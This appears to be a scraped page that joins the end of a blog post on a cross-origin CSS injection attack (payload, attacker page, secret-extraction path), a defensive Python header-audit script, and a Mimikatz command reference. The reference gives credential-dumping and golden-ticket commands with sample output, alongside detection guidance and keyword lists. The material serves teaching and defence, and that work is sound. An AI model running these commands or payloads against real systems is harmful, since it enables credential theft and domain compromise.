     The attack works as follows: we want to bypass the same-origin policy in order to steal the secret embedded on the page. You can think of this secret as a Cross-Site Request Forgery (CSRF) token, credit card number, password etc. We are going to do this by forcing our victim's browser to use the injectable page as CSS on a page we control. The attack will extract the information by having the piece of information we are targeting interpreted as an attribute of a CSS property, i.e. a font-family name or background image URL value. So in summary, the attacker prepares a page that includes the vulnerable page as a style sheet, and extracts the information (usually using JavaScript). Let's see how this works.

     Payload

     We're going to use the following injection payload:

     %0A{}.extract{font-family:'

     This will cause the page to render as follows:

     <!DOCTYPE html asfdasfdadf>
     <html>
     <head>
     <link rel="stylesheet" href="incorrectMime.php?type=plain">
     </head>
     <div id="text">
     This text should be red <br>
     </div>
     Injection point: {}extract{font-family:' secret goes here'}
     </html>

     Which means we effectively have a page that, when interpreted as CSS, will have a font-family name of "secret goes here". It looks good; all we need to do now is host this injected page on a page under our control and extract the CSS property using JavaScript.

     Extraction

     In order to get hold of the font-family name we just created we need to host the injected page as a CSS style sheet, also remembering that we need to force the style sheet to be loaded under Quirks Mode! So pay attention to the DTD of the attack page. Here's the little page I prepared for this example:

     <!DOCTYPE afdssadfsafdd>
     <html>
     <head>
     <link charset="utf-8" type="text/css" rel="stylesheet" href="injectme.php?injectme=%0A{}extract{font-family:'">
     </head>
     <body>
     adsfassdf
     </body>
     </html>

     Once it's loaded up we can extract any CSS properties by using the following DOM path:

     document.styleSheets[i].cssRules[j].cssText

     where i, j are the indices needed to reach the desired cssText property. In our case it will be i = j = 0. Here's what it looks like when the information has been extracted correctly and loaded up into the DOM for extraction:

     Secret extracted successfully as a font-family name

     Boom! Secret extracted, game over.

     References and Further Reading

     Lin-Shung Huang, Chris Evans, Collin Jackson; Protecting Browsers from Cross-Origin CSS Attacks, https://www.linshunghuang.com/papers/css.pdf [ACM Conference on Computer and Communications Security (CCS) 2010]
     Wikipedia, Quirks Mode, https://en.wikipedia.org/wiki/Quirks_mode [retrieved 2/14/2016]
     @filedescriptor, Cross-Origin CSS Attacks Revisited (feat. UTF-16), http://blog.innerht.ml/cross-origin-css-attacks-revisited-feat-utf-16/ [retrieved 2/14/2016]
     Mozilla Developer Network, Quirks Mode and Standards Mode, https://developer.mozilla.org/en-US/docs/Quirks_Mode_and_Standards_Mode [retrieved 2/14/2016]
     Mozilla Developer Network, Mozilla Quirks Mode Behavior, https://developer.mozilla.org/en-US/docs/Mozilla_Quirks_Mode_Behavior [retrieved 2/14/2016]
     CVE-2015-5826, https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5826
     CVE-2015-1287, https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1287

     Posted by Keith Makan at 11:00
     Source: http://blog.k3170makan.com/2016/02/stealing-secrets-with-css-cross-origin.html
    1 point
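As an added example (not from the original post): a small Python audit of how a response is treated when a quirks-mode page under someone else's control pulls it in as a stylesheet. Since the attacker chooses the DTD of the attack page, the page that holds the secret cannot rely on its own doctype; what it does control is sending a real Content-Type and `X-Content-Type-Options: nosniff`, which the Fetch standard honours for style loads by rejecting any response whose MIME type is not text/css. The responses are constructed, modelled on the incorrectMime.php experiment above.

```python
def parse_response(raw):
    """Split a constructed HTTP/1.1 response into (status line, headers, body).
    Header names are lower-cased so lookups are case-insensitive."""
    head, _, body = raw.partition("\r\n\r\n")
    status, _, header_block = head.partition("\r\n")
    headers = {}
    for line in header_block.split("\r\n"):
        if line:
            name, _, value = line.partition(":")
            headers[name.strip().lower()] = value.strip()
    return status, headers, body


def mime_essence(content_type):
    """'text/css; charset=utf-8' -> 'text/css' (case-folded, parameters dropped)."""
    return content_type.split(";", 1)[0].strip().lower()


def stylesheet_verdict(headers):
    """How a browser treats this response when a quirks-mode page it does not
    belong to references it via <link rel="stylesheet">.

    'css'                 proper text/css; loads as the server intended
    'blocked-by-nosniff'  wrong type, but X-Content-Type-Options: nosniff makes
                          the browser reject it for a style destination
    'risky-quirks-sniff'  wrong or missing type and no nosniff: in quirks mode
                          the Content-Type is ignored (the experiment in the
                          post), so injectable text in the body can end up as
                          CSS property values
    """
    if mime_essence(headers.get("content-type", "")) == "text/css":
        return "css"
    if headers.get("x-content-type-options", "").strip().lower() == "nosniff":
        return "blocked-by-nosniff"
    return "risky-quirks-sniff"


def audit(raw):
    """Verdict for a raw response string."""
    return stylesheet_verdict(parse_response(raw)[1])


# Constructed responses in the shape of the incorrectMime.php experiment.
SECRET_PAGE_NO_NOSNIFF = (
    "HTTP/1.1 200 OK\r\nContent-Type: text/plain\r\n\r\n"
    "Injection point: {}extract{font-family:' secret goes here'}")
SECRET_PAGE_WITH_NOSNIFF = (
    "HTTP/1.1 200 OK\r\nContent-Type: text/html; charset=utf-8\r\n"
    "X-Content-Type-Options: nosniff\r\n\r\n"
    "Injection point: {}extract{font-family:' secret goes here'}")
REAL_STYLESHEET = (
    "HTTP/1.1 200 OK\r\nContent-Type: TEXT/CSS; charset=utf-8\r\n\r\n"
    "#text { color: red }")

if __name__ == "__main__":
    for label, raw in [("plain, no nosniff", SECRET_PAGE_NO_NOSNIFF),
                       ("html + nosniff", SECRET_PAGE_WITH_NOSNIFF),
                       ("real css", REAL_STYLESHEET)]:
        print("%-18s -> %s" % (label, audit(raw)))
```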
  13. Unofficial Guide to Mimikatz & Command Reference

Mimikatz Command Reference
Version: Mimikatz 2.0 alpha 20151113 (oe.eo) edition [11/13/2015]
Page last updated: 1/05/2016

Introduction:
It seems like many people on both sides of the fence, Red & Blue, aren’t familiar with most of Mimikatz’s capabilities, so I put together this information on all the available commands I could find. I plan to update as I can with additional content about the most useful commands. This way both Red & Blue teams better understand the full capability and are better able to secure the enterprises they are hired to protect.

I developed this reference after speaking with a lot of people hired to both defend and attack networks, and I learned that outside of a couple of the top 3 used Mimikatz commands, not many knew about the full capability of Mimikatz. This page details as best as possible what each command is, how it works, the rights required to run it, the parameters (required & optional), as well as screenshots and additional context (where possible). There are several I haven’t delved fully into, but expect to in the near future. While I will continue to post articles to ADSecurity.org about different aspects of Mimikatz usage, I plan to keep this as updated and as comprehensive as possible.

This information is provided to help organizations better understand Mimikatz capability and is not to be used for unlawful activity. Do NOT use Mimikatz on computers you don’t own or haven’t been allowed/approved to use. In other words, don’t pen-test/red-team systems with Mimikatz without a “get out of jail free card”. This page and all content contained within is not to be reproduced in whole or part without express written consent by this page’s author.

I did not write Mimikatz and therefore have no special insight. All of the information on this page is derived from using Mimikatz, reading the source code, conversations with Benjamin, his blog & GitHub pages, and my own work/research. Any errors on this page are my own only. Send comments/kudos here.

Many thanks to Benjamin Delpy for writing and continuously updating Mimikatz. His work has greatly improved the security of Windows, especially Windows 10.

Mimikatz Overview:
Mimikatz is one of the best tools to gather credential data from Windows systems. In fact I consider Mimikatz to be the “Swiss army knife” (or multi-tool) of Windows credentials – that one tool that can do everything. Since the author of Mimikatz, Benjamin Delpy, is French, most of the resources describing Mimikatz usage are in French, at least on his blog. The Mimikatz GitHub repository is in English and includes useful information on command usage.

Mimikatz is a Windows x32/x64 program coded in C by Benjamin Delpy (@gentilkiwi) in 2007 to learn more about Windows credentials (and as a Proof of Concept). There are two optional components that provide additional features, mimidrv (driver to interact with the Windows kernel) and mimilib (AppLocker bypass, Auth package/SSP, password filter, and sekurlsa for WinDBG). Mimikatz requires administrator or SYSTEM and often debug rights in order to perform certain actions and interact with the LSASS process (depending on the action requested). The Mimikatz.exe contains, or at least should contain, all capability noted there.

Mimikatz capability can be leveraged by compiling and running your own version, running the Mimikatz executable, leveraging the MetaSploit script, the official Invoke-Mimikatz PowerShell version, or one of the dozens of Mimikatz PowerShell variants (I happen to be partial to PowerShell Empire, because Empire is awesome!).

The Mimikatz source code and release binaries are available on GitHub and are licensed under Creative Commons with the following detail:

You are free to:
* Share — copy and redistribute the material in any medium or format
* Adapt — remix, transform, and build upon the material
* for any purpose, even commercially.
The licensor cannot revoke these freedoms as long as you follow the license terms.
Attribution — You must give appropriate credit, provide a link to the license, and indicate if changes were made. You may do so in any reasonable manner, but not in any way that suggests the licensor endorses you or your use.
No additional restrictions — You may not apply legal terms or technological measures that legally restrict others from doing anything the license permits.

Mimikatz Author(s):
Benjamin DELPY gentilkiwi, you can contact him on Twitter ( @gentilkiwi ) or by mail ( benjamin [at] gentilkiwi.com )
DCSync function in lsadump module was co-written with Vincent LE TOUX, you can contact him by mail ( vincent.letoux [at] gmail.com ) or visit his website ( http://www.mysmartlogon.com )

“Official” Mimikatz Links:
Mimikatz GitHub Location (Source Code)
Mimikatz Releases (includes binaries)
Mimikatz GitHub Wiki (Documentation, some of which is reproduced here)
GentilKiwi Blog (much of it is in French, use Chrome/other for translation)

Mimikatz & Credentials:
After a user logs on, a variety of credentials are generated and stored in the Local Security Authority Subsystem Service, LSASS, process in memory. This is meant to facilitate single sign-on (SSO), ensuring a user isn’t prompted each time resource access is requested. The credential data may include NTLM password hashes, LM password hashes (if the password is <15 characters), and even clear-text passwords (to support WDigest and SSP authentication among others). While you can prevent a Windows computer from creating the LM hash in the local computer SAM database (and the AD database), this doesn’t prevent the system from generating the LM hash in memory. By default, Windows Server 2008 and Windows Vista no longer generate LM hashes for users unless explicitly enabled.

Starting with Windows 8.1 and Windows Server 2012 R2, the LM hash and “clear-text” password are no longer in memory. This functionality was also “back-ported” to earlier versions of Windows (Windows 7/8/2008R2/2012) in kb2871997, though in order to prevent the “clear-text” password from being placed in LSASS, the following registry key needs to be set to “0” (Digest Disabled):

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest
“UseLogonCredential” (DWORD)

This registry key is worth monitoring in your environment since an attacker may wish to set it to 1 to enable Digest password support, which forces “clear-text” passwords to be placed in LSASS on any version of Windows from Windows 7/2008R2 up to Windows 10/2012R2. Windows 8.1/2012 R2 and newer do not have a “UseLogonCredential” DWORD value, so it would have to be created. The existence of this key on these systems may indicate a problem.

Note that running code directly on a target system is rarely desirable for an attacker, so Mimikatz is continuously updated with new capability to be run remotely. This includes running Mimikatz remotely against a remote system to dump credentials, using Invoke-Mimikatz remotely with PowerShell Remoting, and DCSync, the latest feature to grab password data for any Active Directory account in the domain remotely against a DC without any Mimikatz code being run on the DC (it uses Microsoft’s official Domain Controller replication APIs, once the correct rights are attained).

Available Credentials by OS:
Benjamin Delpy posted an Excel chart on OneDrive (shown below) that shows what type of credential data is available in memory (LSASS), including on Windows 8.1 and Windows 2012 R2, which have enhanced protection mechanisms reducing the amount and type of credentials kept in memory.
PowerShell & Mimikatz:
The majority of Mimikatz functionality is available in PowerSploit (PowerShell Post-Exploitation Framework) through the “Invoke-Mimikatz” PowerShell script (written by Joseph Bialek) which “leverages Mimikatz 2.0 and Invoke-ReflectivePEInjection to reflectively load Mimikatz completely in memory. This allows you to do things such as dump credentials without ever writing the Mimikatz binary to disk.” Note that the PowerSploit framework is now hosted in the “PowerShellMafia” GitHub repository.

What gives Invoke-Mimikatz its “magic” is the ability to reflectively load the Mimikatz DLL (embedded in the script) into memory. The Invoke-Mimikatz code can be downloaded from the Internet (or intranet server), and executed from memory without anything touching disk. Furthermore, if Invoke-Mimikatz is run with the appropriate rights and the target computer has PowerShell Remoting enabled, it can pull credentials from other systems, as well as execute the standard Mimikatz commands remotely, without files being dropped on the remote system.

Invoke-Mimikatz is not updated when Mimikatz is, though it can be (manually). One can swap out the DLL encoded elements (32bit & 64bit versions) with newer ones. Will Schroeder (@HarmJ0y) has information on updating the Mimikatz DLLs in Invoke-Mimikatz (it’s not a very complicated process). The PowerShell Empire version of Invoke-Mimikatz is usually kept up to date.

Use mimikatz to dump credentials out of LSASS:
Invoke-Mimikatz -DumpCreds

Use mimikatz to export all private certificates (even if they are marked non-exportable):
Invoke-Mimikatz -DumpCerts

Elevate privilege to have debug rights on remote computer:
Invoke-Mimikatz -Command "privilege::debug exit" -ComputerName "computer1"

The Invoke-Mimikatz “Command” parameter enables Invoke-Mimikatz to run custom Mimikatz commands. Defenders should expect that any functionality included in Mimikatz is available in Invoke-Mimikatz.
Detecting Mimikatz:
There are several ways to potentially detect Mimikatz use on a network, though none are guaranteed. Since Mimikatz’s source code is on GitHub, anyone with Visual Studio can compile their own version. I built my own version of Mimikatz called “kitikatz” by replacing all instances of “mimikatz” with “kitikatz” and the detection rate at VirusTotal was not good (4/54). Windows Defender on my Windows 10 system detected it. I then replaced “Benjamin Delpy” and “gentilkiwi” with the same words, just replacing the e’s with 3’s and the i’s with 1’s. The detection rate was still poor (4/54). Windows Defender on my Windows 10 system did not detect it. So, your mileage will vary regarding detection. Benjamin Delpy publishes YARA rules for Mimikatz on the Mimikatz GitHub repository.

Run AntiVirus software with the latest definition files. According to VirusTotal, the mimikatz.exe dated 11/11/2015 (32bit & 64bit) is detected by 35/35 of the AV engines. Renaming the file doesn’t change the scan results. Note that Benjamin has noted real-world results to be less successful. However, AV will usually flag the known bad files. AntiVirus is part of foundational security – the first layer in “defense in depth”.

Mimikatz (as of October) activates attached BusyLights. [implemented in Mimikatz version 2.0 alpha 20151008 (oe.eo) edition]

Leverage security software to identify processes that interact with LSASS. Security software that monitors for process injection may also be able to regularly detect Mimikatz use.

HoneyTokens/HoneyHashes involve placing special credentials in memory on a number of computers in the enterprise. These credentials are flagged so when anyone attempts to use them, a critical alert goes out. This requires some sort of push method as well as placing credentials that are attractive to an attacker. In theory, this could detect credential theft and use in the environment.

If the WDIGEST registry key (HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest) is supposed to be set to “0” in the enterprise to prevent “clear-text” passwords from being stored in LSASS and there are systems where it was switched to “1”, this may be indicative of credential theft activity. This registry key is worth monitoring in your environment since an attacker may wish to set it to 0 to enable Digest password support which forces “clear-text” passwords to be placed in LSASS on any version of Windows from Windows 7/2008R2 up to Windows 10/2012R2 (probably 2016 as well).

Forged Kerberos ticket detection is covered on this page I published in early 2015. These methods can detect Golden Tickets, Silver Tickets, and Trust Tickets. I also have information on how to detect MS14-068 Kerberos vulnerability exploitation.

Enable LSA Protection on all Windows versions in the enterprise that support it. This prevents Mimikatz from working “out-of-the-box” and requires use of the Mimikatz driver which logs events when it interacts with LSASS.

Mimikatz & LSA Protection:
Windows Server 2012 R2 and Windows 8.1 include a new feature called LSA Protection which involves enabling LSASS as a protected process on Windows Server 2012 R2 (Mimikatz can bypass this with a driver, but that should make some noise in the event logs):

The LSA, which includes the Local Security Authority Server Service (LSASS) process, validates users for local and remote sign-ins and enforces local security policies. The Windows 8.1 operating system provides additional protection for the LSA to prevent reading memory and code injection by non-protected processes. This provides added security for the credentials that the LSA stores and manages.
Enabling LSA protection:
Open the Registry Editor (RegEdit.exe), and navigate to the registry key that is located at: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa and set the value of the registry key to: “RunAsPPL”=dword:00000001.

Create a new GPO and browse to Computer Configuration, Preferences, Windows Settings. Right-click Registry, point to New, and then click Registry Item. The New Registry Properties dialog box appears. In the Hive list, click HKEY_LOCAL_MACHINE. In the Key Path list, browse to SYSTEM\CurrentControlSet\Control\Lsa. In the Value name box, type RunAsPPL. In the Value type box, click the REG_DWORD. In the Value data box, type 00000001. Click OK.

LSA Protection prevents non-protected processes from interacting with LSASS. Mimikatz can still bypass this with a driver (“!+”).

Detecting Invoke-Mimikatz:
Ensure all Windows systems have PowerShell v3 or newer. Newer versions of PowerShell have better logging features, especially PowerShell v5.

Enable PowerShell Module Logging via Group Policy: Computer Configuration, Policies, Administrative Templates, Windows Components, and Windows PowerShell, Turn on Module Logging. Enter “*” and click OK. This will log all PowerShell activity including all PowerShell modules. PowerShell activity will be logged to the PowerShell Operational Log. Push or pull these events to a central logging server (via Windows Event Forwarding or similar) or SIEM.

Parse PowerShell events for the following:
“System.Reflection.AssemblyName”
“System.Reflection.Emit.AssemblyBuilderAccess”
“System.Runtime.InteropServices.MarshalAsAttribute”
“TOKEN_PRIVILEGES”
“SE_PRIVILEGE_ENABLED”

Note: While it may be possible to identify Mimikatz usage by alerting on “mimikatz”, “Delpy”, or “gentilkiwi”, a “sophisticated” attacker will likely roll their own version of Mimikatz or Invoke-Mimikatz without these keywords.

Detecting Offensive PowerShell Tools:
Many PowerShell offensive tools use the following calls which are logged in PowerShell Module Logging.
“GetDelegateForFunctionPointer”
“System.Reflection.AssemblyName”
“System.Reflection.Emit.AssemblyBuilderAccess”
“System.Management.Automation.WindowsErrorReporting”
“MiniDumpWriteDump”
“TOKEN_IMPERSONATE”
“TOKEN_DUPLICATE”
“TOKEN_ADJUST_PRIVILEGES”
“TOKEN_PRIVILEGES”

“Sneaky” Mimikatz Execution:
Casey Smith (@subtee & blog) has done a LOT of work showing how application whitelisting is not the panacea many believe it to be. Despite that, application whitelisting is a solid layer in a defense in depth strategy. Casey also has come up with many creative and sneaky ways to execute Mimikatz.
Execute Mimikatz Inside of RegSvcs or RegAsm – .NET utilities
Proof of Concept Mimikatz packed & hidden in an image file
Downloads and Executes Mimikatz In Memory From GitHub

Most Popular Mimikatz Commands:
Here are just some of the most popular Mimikatz commands and related functionality.
CRYPTO::Certificates – list/export certificates
KERBEROS::Golden – create golden/silver/trust tickets
KERBEROS::List – List all user tickets (TGT and TGS) in user memory. No special privileges required since it only displays the current user’s tickets. Similar to functionality of “klist”.
KERBEROS::PTT – pass the ticket. Typically used to inject a stolen or forged Kerberos ticket (golden/silver/trust).
LSADUMP::DCSync – ask a DC to synchronize an object (get password data for account). No need to run code on DC.
LSADUMP::LSA – Ask LSA Server to retrieve SAM/AD enterprise (normal, patch on the fly or inject). Use to dump all Active Directory domain credentials from a Domain Controller or lsass.dmp dump file. Also used to get specific account credential such as krbtgt with the parameter /name: “/name:krbtgt”
LSADUMP::SAM – get the SysKey to decrypt SAM entries (from registry or hive).
The SAM option connects to the local Security Account Manager (SAM) database and dumps credentials for local accounts. This is used to dump all local credentials on a Windows computer.
LSADUMP::Trust – Ask LSA Server to retrieve Trust Auth Information (normal or patch on the fly). Dumps trust keys (passwords) for all associated trusts (domain/forest).
MISC::AddSid – Add to SIDHistory to user account. The first value is the target account and the second value is the account/group name(s) (or SID).
MISC::MemSSP – Inject a malicious Windows SSP to log locally authenticated credentials.
MISC::Skeleton – Inject Skeleton Key into LSASS process on Domain Controller. This enables all user authentication to the Skeleton Key patched DC to use a “master password” (aka Skeleton Keys) as well as their usual password.
PRIVILEGE::Debug – get debug rights (this or Local System rights is required for many Mimikatz commands).
SEKURLSA::Ekeys – list Kerberos encryption keys
SEKURLSA::Kerberos – List Kerberos credentials for all authenticated users (including services and computer account)
SEKURLSA::Krbtgt – get Domain Kerberos service account (KRBTGT) password data
SEKURLSA::LogonPasswords – lists all available provider credentials. This usually shows recently logged on user and computer credentials.
SEKURLSA::Pth – Pass-the-Hash and Over-Pass-the-Hash
SEKURLSA::Tickets – Lists all available Kerberos tickets for all recently authenticated users, including services running under the context of a user account and the local computer’s AD computer account. Unlike kerberos::list, sekurlsa uses memory reading and is not subject to key export restrictions. sekurlsa can access tickets of other sessions (users).
TOKEN::List – list all tokens of the system
TOKEN::Elevate – impersonate a token. Used to elevate permissions to SYSTEM (default) or find a domain admin token on the box
TOKEN::Elevate /domainadmin – impersonate a token with Domain Admin credentials.
ADSecurity Mimikatz Posts:
All posts mentioning Mimikatz: ADSecurity.org Mimikatz Posts
Mimikatz and Active Directory Kerberos Attacks
Dump Clear-Text Passwords for All Admins in the Domain Using Mimikatz DCSync
How Attackers Use Kerberos Silver Tickets to Exploit Systems
Mimikatz DCSync Usage, Exploitation, and Detection
Sneaky Active Directory Persistence #12: Malicious Security Support Provider (SSP)
Sneaky Active Directory Persistence #11: Directory Service Restore Mode (DSRM)
Kerberos Golden Tickets are Now More Golden
It’s All About Trust – Forging Kerberos Trust Tickets to Spoof Access across Active Directory Trusts
Detecting Mimikatz Use

Mimikatz Command Guide:
Mimikatz can be executed in interactive mode by simply running “Mimikatz.exe” or pass it a command and exit (example: ‘Mimikatz “kerberos::list” exit’). Invoke-Mimikatz does not have an interactive mode. Mimikatz can be used to pass commands from the command line to Mimikatz for processing in order, which is useful for Invoke-Mimikatz or when using Mimikatz in scripts. Appending “exit” exits Mimikatz after the last command is executed (do this so Mimikatz exits gracefully).

PS C:\temp\mimikatz> .\mimikatz "privilege::debug" "sekurlsa::logonpasswords" exit

  .#####.   mimikatz 2.0 alpha (x64) release "Kiwi en C" (Nov 13 2015 00:44:32)
 .## ^ ##.
 ## / \ ##  /* * *
 ## \ / ##   Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 '## v ##'   http://blog.gentilkiwi.com/mimikatz             (oe.eo)
  '#####'                                     with 17 modules * * */

mimikatz(commandline) # privilege::debug
Privilege '20' OK

mimikatz(commandline) # sekurlsa::logonpasswords

Authentication Id : 0 ; 646260 (00000000:0009dc74)
Session           : RemoteInteractive from 2
User Name         : adsadministrator
Domain            : ADSECLAB
Logon Server      : ADSDC03
Logon Time        : 11/27/2015 11:41:27 AM
SID               : S-1-5-21-1581655573-3923512380-696647894-500
        msv :
         [00000003] Primary
         * Username   : ADSAdministrator
         * Domain     : ADSECLAB
         * NTLM       : 5164b7a0fda365d56739954bbbc23835
         * SHA1       : f8db297cb2ae403f8915675cebe79643d0d3b09f
         [00010000] CredentialKeys
         * NTLM       : 5164b7a0fda365d56739954bbbc23835
         * SHA1       : f8db297cb2ae403f8915675cebe79643d0d3b09f
        tspkg :
        wdigest :
         * Username   : ADSAdministrator
         * Domain     : ADSECLAB
         * Password   : (null)
        kerberos :
         * Username   : adsadministrator
         * Domain     : LAB.ADSECURITY.ORG
         * Password   : (null)
        ssp : KO

The interactive mode provides a “Mimikatz console” where commands can be entered and executed in real-time:

PS C:\temp\mimikatz> .\mimikatz

  .#####.   mimikatz 2.0 alpha (x64) release "Kiwi en C" (Nov 13 2015 00:44:32)
 .## ^ ##.
 ## / \ ##  /* * *
 ## \ / ##   Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 '## v ##'   http://blog.gentilkiwi.com/mimikatz             (oe.eo)
  '#####'                                     with 17 modules * * */

mimikatz # privilege::debug
Privilege '20' OK

mimikatz # sekurlsa::logonpasswords

Authentication Id : 0 ; 646260 (00000000:0009dc74)
Session           : RemoteInteractive from 2
User Name         : adsadministrator
Domain            : ADSECLAB
Logon Server      : ADSDC03
Logon Time        : 11/27/2015 11:41:27 AM
SID               : S-1-5-21-1581655573-3923512380-696647894-500
        msv :
         [00000003] Primary
         * Username   : ADSAdministrator
         * Domain     : ADSECLAB
         * NTLM       : 5164b7a0fda365d56739954bbbc23835
         * SHA1       : f8db297cb2ae403f8915675cebe79643d0d3b09f
         [00010000] CredentialKeys
         * NTLM       : 5164b7a0fda365d56739954bbbc23835
         * SHA1       : f8db297cb2ae403f8915675cebe79643d0d3b09f
        tspkg :
        wdigest :
         * Username   : ADSAdministrator
         * Domain     : ADSECLAB
         * Password   : (null)
        kerberos :
         * Username   : adsadministrator
         * Domain     : LAB.ADSECURITY.ORG
         * Password   : (null)
        ssp : KO
        credman :

Mimikatz Command Reference:

Mimikatz Modules:
CRYPTO
  CRYPTO::Certificates
DPAPI
EVENT
KERBEROS
  Golden Tickets
  Silver Tickets
  Trust Tickets
  KERBEROS::PTT
LSADUMP
  DCSync
  LSADUMP::LSA
  LSADUMP::SAM
  LSADUMP::Trust
MISC
MINESWEEPER
NET
PRIVILEGE
  PRIVILEGE::Debug
PROCESS
SERVICE
SEKURLSA
  SEKURLSA::Kerberos
  SEKURLSA::Krbtgt
  SEKURLSA::LogonPasswords
  SEKURLSA::Pth
STANDARD
TOKEN
  TOKEN::Elevate
  TOKEN::Elevate /domainadmin
TS
VAULT

NOTE: Any item marked “experimental” should only be used in test environments.

CRYPTO
The CRYPTO Mimikatz module provides advanced capability to interface with Windows cryptographic functions (CryptoAPI). Typical use is to export certificates that aren’t marked as “exportable.”
CRYPTO::CAPI – (experimental) Patch CryptoAPI layer for easy export
CRYPTO::Certificates – list/export certificates
Carlos Perez (aka DarkOperator) has a great blog post on using Mimikatz to export certificates. This command lists certificates and properties of their keys. It can export certificates too.
Typically requires “privilege::debug”
/systemstore – optional – the system store that must be used (default: CERT_SYSTEM_STORE_CURRENT_USER)
/store – optional – the store that must be used to list/export certificates (default: My) – full list with crypto::stores
/export – optional – export all certificates to files (public parts in DER, private parts in PFX files – password protected with: mimikatz)

Benjamin’s comments on CRYPTO::Certificates:
See crypto::stores for valid systemstore list, and its output for store list.
Non exportable keys (with KO - ERROR kuhl_m_crypto_exportCert ; Export / CreateFile (0x8009000b)) can often be exported with crypto::capi and/or crypto::cng
Despite crypto::capi or crypto::cng patch, you must have correct ACL on filesystem to access private keys (UAC… )
Some smartcard crypto providers can report a successful private export (it’s not, of course )

CRYPTO::CNG – (experimental) Patch CNG service for easy export (patches “KeyIso” service)
CRYPTO::Hash – hash a password (with optional user name)
CRYPTO::Keys – list/export keys containers
CRYPTO::Providers – list cryptographic providers
CRYPTO::Stores – list cryptographic stores
/systemstore – optional – the system store that must be used to list stores (default: CERT_SYSTEM_STORE_CURRENT_USER)

Store Options:
CERT_SYSTEM_STORE_CURRENT_USER or CURRENT_USER
CERT_SYSTEM_STORE_CURRENT_USER_GROUP_POLICY or USER_GROUP_POLICY
CERT_SYSTEM_STORE_LOCAL_MACHINE or LOCAL_MACHINE
CERT_SYSTEM_STORE_LOCAL_MACHINE_GROUP_POLICY or LOCAL_MACHINE_GROUP_POLICY
CERT_SYSTEM_STORE_LOCAL_MACHINE_ENTERPRISE or LOCAL_MACHINE_ENTERPRISE
CERT_SYSTEM_STORE_CURRENT_SERVICE or CURRENT_SERVICE
CERT_SYSTEM_STORE_USERS or USERS
CERT_SYSTEM_STORE_SERVICES or SERVICES

DPAPI
DPAPI::Blob – Unprotect a DPAPI blob with API or Masterkey
DPAPI::Cache
DPAPI::CAPI – CAPI key test
DPAPI::CNG – CNG key test
DPAPI::Cred – CRED test
DPAPI::CredHist – Configure a Credhist file
DPAPI::MasterKey – Configure a Masterkey file, unprotect (key depending)
DPAPI::Protect – Protect data using DPAPI
DPAPI::Vault – VAULT test

EVENT
EVENT::Clear – Clear an event log
EVENT::Drop – (experimental) Patch Events service to avoid new events

KERBEROS
The KERBEROS Mimikatz module is used to interface with the official Microsoft Kerberos API. No special rights are required for the commands in this module.
KERBEROS::Clist – list tickets in MIT/Heimdal ccache
KERBEROS::Golden – create golden/silver/trust tickets
The capability of this command is based on the password hash type retrieved.

Type    Requirement    Scope
Golden  KRBTGT hash    Domain/Forest
Silver  Service hash   Service
Trust   Trust hash     Domain/Forest -> Domain/Forest (based on account access)

Golden Ticket
A Golden Ticket is a TGT using the KRBTGT NTLM password hash to encrypt and sign. A Golden Ticket (GT) can be created to impersonate any user (real or imagined) in the domain as a member of any group in the domain (providing a virtually unlimited amount of rights) to any and every resource in the domain. Since the Golden Ticket is an authentication ticket (TGT described below), its scope is the entire domain (and the AD forest by leveraging SID History) since the TGT is used to get service tickets (TGS) used to access resources. The Golden Ticket (TGT) contains user group membership information (PAC) and is signed and encrypted using the domain’s Kerberos service account (KRBTGT) which can only be opened and read by the KRBTGT account. To summarize, once an attacker gets access to the KRBTGT password hash, they can create Golden Tickets (TGT) that provide access to anything in AD at any time.

Mimikatz Golden Ticket Command Reference:
The Mimikatz command to create a golden ticket is “kerberos::golden”
/domain – the fully qualified domain name. In this example: “lab.adsecurity.org”.
/sid – the SID of the domain. In this example: “S-1-5-21-1473643419-774954089-2222329127”.
/sids – Additional SIDs for accounts/groups in the AD forest with rights you want the ticket to spoof. Typically, this will be the Enterprise Admins group for the root domain “S-1-5-21-1473643419-774954089-5872329127-519”. This parameter adds the provided SIDs to the SID History parameter.
/user – username to impersonate
/groups (optional) – group RIDs the user is a member of (the first is the primary group). Add user or computer account RIDs to receive the same access. Default Groups: 513,512,520,518,519 for the well-known Administrator’s groups (listed below).
/krbtgt – NTLM password hash for the domain KDC service account (KRBTGT). Used to encrypt and sign the TGT.
/ticket (optional) – provide a path and name for saving the Golden Ticket file to for later use or use /ptt to immediately inject the golden ticket into memory for use.
/ptt – as an alternate to /ticket – use this to immediately inject the forged ticket into memory for use.
/id (optional) – user RID. Mimikatz default is 500 (the default Administrator account RID).
/startoffset (optional) – the start offset when the ticket is available (generally set to –10 or 0 if this option is used). Mimikatz Default value is 0.
/endin (optional) – ticket lifetime. Mimikatz Default value is 10 years (~5,262,480 minutes). Active Directory default Kerberos policy setting is 10 hours (600 minutes).
/renewmax (optional) – maximum ticket lifetime with renewal. Mimikatz Default value is 10 years (~5,262,480 minutes). Active Directory default Kerberos policy setting is 7 days (10,080 minutes).
/sids (optional) – set to be the SID of the Enterprise Admins group in the AD forest ([ADRootDomainSID]-519) to spoof Enterprise Admin rights throughout the AD forest (AD admin in every domain in the AD Forest).
/aes128 – the AES128 key
/aes256 – the AES256 key

Golden Ticket Default Groups:
Domain Users SID: S-1-5-21<DOMAINID>-513
Domain Admins SID: S-1-5-21<DOMAINID>-512
Schema Admins SID: S-1-5-21<DOMAINID>-518
Enterprise Admins SID: S-1-5-21<DOMAINID>-519 (this is only effective when the forged ticket is created in the Forest root domain, though add using /sids parameter for AD forest admin rights)
Group Policy Creator Owners SID: S-1-5-21<DOMAINID>-520

kerberos::golden /admin:ADMINACCOUNTNAME /domain:DOMAINFQDN /id:ACCOUNTRID /sid:DOMAINSID /krbtgt:KRBTGTPASSWORDHASH /ptt

Command Example:
.\mimikatz "kerberos::golden /admin:DarthVader /domain:rd.lab.adsecurity.org /id:9999 /sid:S-1-5-21-135380161-102191138-581311202 /krbtgt:13026055d01f235d67634e109da03321 /startoffset:0 /endin:600 /renewmax:10080 /ptt" exit

Golden Ticket References:
* Golden Tickets are now More Golden (with SID History)

Update 1/5/2016:
